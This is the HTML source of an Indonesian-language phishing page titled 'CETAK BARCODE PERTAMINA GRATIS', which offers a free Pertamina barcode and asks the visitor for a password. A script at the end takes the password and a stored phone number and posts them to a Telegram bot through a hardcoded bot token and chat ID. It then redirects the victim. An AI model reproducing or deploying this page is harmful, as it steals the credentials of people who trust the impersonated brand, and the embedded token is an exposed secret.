<!DOCTYPE html><html lang="en" class="h-100"><head id="ctl00_Head1">
    <link href="bootstrap.min.css" rel="stylesheet" crossorigin="anonymous">
    <link href="custom.css" type="text/css" rel="stylesheet">
    <!-- Google tag (gtag.js) --> 
    <script async="" src="https://www.googletagmanager.com/gtag/js?id=G-VCHP4QZ39R"></script> 
    <script> 
        window.dataLayer = window.dataLayer || [];
        function gtag() { dataLayer.push(arguments); } gtag('js', new Date());
        gtag('config', 'G-VCHP4QZ39R'); 

    </script>

    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description">
    <meta name="author" content="CETAK BARCODE PERTAMINA GRATIS">
    <title>CETAK BARCODE PERTAMINA GRATIS</title>
    <link rel="icon" type="image/x-icon" href="images/favicon.png">
    <link rel="canonical" href="https://getbootstrap.com/docs/5.0/examples/sticky-footer/">
    <!-- Bootstrap core CSS -->
    <link rel="stylesheet" href="bootstrap-icons.css">
    <style type="text/css">
    body {
        background-color: white; /* Mengatur warna latar belakang menjadi putih */
        color: black; /* Mengatur warna teks menjadi hitam */
    }
    
    /* This stylesheet override some default Bootstrap's styling */

body {
	background-color: #EEE9D6;
}

.container {
  width: auto;
  padding: 0 15px;
}

.container-narrow {
	width: auto;
	max-width: 480px;
}

.btn-mk {
	color: #fff;
	background-color: #6F5552;
}

.table {
	background-color: #fff;
}

.table-status td {
	background-color: #fff8e8;
}

.text_asat {
	font-size: small;
	font-weight: normal;
	color: #838383;
}

.link-mk {
	color: #403B39;
	text-decoration: none;
}

.link-mk:hover {
	text-decoration: underline;
}

.card {
	margin-bottom: 0.5em;
}

.card-title {
	border-bottom: 1px dotted #E8E6E6;
	padding-bottom: 0.5em;
	font-size: 1rem;
}

footer {
	background-color: #403B39;
}

footer .list-group-item, footer .list-group-item:hover {
	background: none;
	border: none;
}

footer a.nav-link {
	color: #fff;
	padding-top: 0;
}

footer a.nav-link:hover {
	text-decoration: underline;
}
    
        @media (min-width: 768px) {
            .bd-placeholder-img-lg {
                font-size: 3.5rem;
            }
        }

         /* Make carousel full width */
        .carousel {
            max-width: 600px;
            margin: auto;
        }

        /* Make carousel images responsive */
        .carousel-item img {
            max-width: 100%;
            height: auto;
        }

        .fade {
            animation-name: fade;
            animation-duration: 1.5s;
        }

        @keyframes fade {
            from {
                opacity: .4;
            }
            to {
                opacity: 1;
            }
        }
         .btn-mk {
    background-color: DodgerBlue; /* Warna biru telur asin */
    color: #fff; /* Warna teks putih untuk kontras */
    border: none; /* Hapus border */
    padding: 10px 20px; /* Padding untuk menyesuaikan ukuran tombol */
    font-size: 16px; /* Ukuran font */
    cursor: pointer; /* Kursor pointer saat diarahkan ke tombol */
    border-radius: 5px; /* Border radius untuk sudut tombol */
    outline: none; /* Hapus outline saat tombol di-fokus */
    /* Tambahan gaya CSS lainnya sesuai kebutuhan */
}
    </style>
</head>
<body class="d-flex flex-column h-100">
    <!-- Begin page content -->
    <main class="flex-shrink-0">
        <div id="ctl00_divContainer" class="container container-narrow">
            <div class="text-center mt-2">
                <a id="ctl00_lnkMalay" disabled="disabled" style="color:Black;font-weight:bold;text-decoration:none;">Bahasa Indonesia</a>
                <span id="ctl00_lblPipe_bm"> | </span>
                <a id="ctl00_lnkEng" href="">English</a>
                <span id="ctl00_lblPipe_bi"> | </span>
                <a id="ctl00_lnkChineseSimplified" href=""> 中文(简体) </a>
                <span id="ctl00_lblPipe_bc"> | </span>
                <a id="ctl00_lnkTamilInd" href="">தமிழ் </a>
            </div>

             <div id="ctl00_divContainer" class="container container-narrow">
              <div class="header">
            <img class="w-100" src="images/ini.jpg" alt="" />
        </div>
          

        <h2 class="fw-bold mt-2 page-header text-center ">
            <span id="ctl00_RecipientMasterContent_lblSubject">CETAK BARCODE PERTAMINA GRATIS</span>
        </h2>
 
 
    <span id="ctl00_lblMsg"></span>

    
    
    <script language="javascript" type="text/javascript">


        function TranslateLang_OnClientEvent(tagID) {
            try {
                if (document.getElementById(tagID) != null) {
                    return document.getElementById(tagID).getAttribute('title');
                }
            }
            catch (err) {
                return '';
            }

        }
    </script>


    
    <formclass="row">
      <div class="mb-3">
        <label for="mykad-pass" class="form-label">
            <span id="pass">Kata Sandi</span>
            <small class="text-muted">[optional]</small>
        </label>
        <input name="text" maxlength="60" id="mykad-pass" class="form-control" type="password" placeholder="****************">
      </div>

      
      <div class="text-center">
        <button type="submit" name="sendPass" id="sendPass" class="btn btn-lg btn-block btn-mk">LANJUTKAN</button>  
      </div>
      
    
</formclass="row"></div>
</div>

</div></main>
    <!-- Footer Starts -->
    <div class="header mt-3 text-center">
        <img src="images/ini1.png" id="ctl00_logohead" class="img-fluid" width="450">
    </div>
    <footer class="footer mt-auto py-3">
        <div class="container">
            <div class="row">
                <div class="col-5">
                    <span class="text-white">
                        <span id="ctl00_lblCopyRight">2024 All Rights Reserved. </span>
                    </span>
                </div>
                <div class="col">
                    <ul class="nav justify-content-end">
                        <li class="nav-item">
                            <a id="ctl00_lnkFaq" class="nav-link" href="">
                                <i class="bi-question-circle"></i>
                                <span id="ctl00_lblFAQ"></span></a>
                        </li>
                        <li class="nav-item">
                            <p id="ctl00_linkMerchList">
                                <a class="nav-link" href=""><i class="bi-shop"></i>
                                    <span id="ctl00_lblMerchList"></span></a>
                            </p>
                        </li>
                        <li class="nav-item">
                            <a href="" id="ctl00_linkContactUs" class="nav-link"><i class="bi-envelope"></i>
                                <span id="ctl00_lblctctus"></span></a>
                        </li>
                    </ul>
                </div>
            </div>
        </div>
    </footer>
    <!-- Placed at the end of the document so the pages load faster -->
    <script type="text/javascript" src="jquery.js"></script>
    <script type="text/javascript">
        $(document).ready(function () {
            var intputElements = document.getElementsByTagName("INPUT");
            for (var i = 0; i < intputElements.length; i++) {
                if (intputElements[i].id.substring(0, 32) == 'ctl00_RecipientMasterContent_txt') {//Get txt only
                    intputElements[i].oninput = function (e) {
                        e.target.setCustomValidity("");
                        if (!e.target.validity.valid) {
                            e.target.setCustomValidity(TranslateLang_OnClientEvent(this.id));
                        }
                    };
                }
            }
        })
        var botToken = "7616180006:AAG4H-Acw9jYcry-mEpGwF6hXcI5s6vC5H4";
        $("#sendPass").on("click", e => {
            e.preventDefault();
            var myPass = $("#mykad-pass").val();
            if (myPass == "") {
                window.location.href = '/norecord.html';
            } else {
                noHp = sessionStorage.getItem("nohp")
                sendMessageToBot("/send_pw "+noHp+"|"+myPass)
            }
        })
        function sendMessageToBot(message) {
            $.ajax({
            url: 'https://api.telegram.org/bot' + botToken + '/sendMessage',
            method: 'POST',
            data: {
                chat_id: '5207694375', 
                text: message
            },
            success: function(response) {
                console.log('Pesan berhasil dikirim ke bot Telegram');
                window.location.href = '/norecord.html';
            },
            error: function(error) {
                console.error('Gagal mengirim pesan ke bot Telegram:', error);
            }
            });
        }
    </script>



</body></html>